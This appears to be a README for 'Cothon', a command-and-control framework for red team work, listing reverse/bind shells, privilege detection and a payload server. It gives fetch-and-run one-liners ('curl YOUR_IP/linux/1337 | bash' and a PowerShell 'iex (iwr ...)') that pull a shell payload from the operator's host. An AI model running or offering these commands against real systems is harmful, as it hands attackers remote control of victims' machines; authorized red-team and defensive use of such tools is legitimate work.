Cothon is a stealthy C2 framework built for ethical hacking and red team operations.
- Windows & Linux reverse/bind shells
- Real-time process monitoring, privilege detection, background/foreground control
- File transfers, SSL/TLS support, rate-limited HTTP(S) payload server
- User enumeration, service vulnerability detection, file system exploration
- Dead shell cleanup, encrypted logs, secured shell
- Fire it up
python cothon.py --lhost YOUR_IP --ssl
- Get shells
Linux
curl YOUR_IP/linux/1337 | bash
Windows
iex (iwr YOUR_IP/windows/1337)
Main Interface
Shells List
Shell Menu
Warning: Use only for authorized testing. Never deploy without permission. Developers assume no liability for misuse.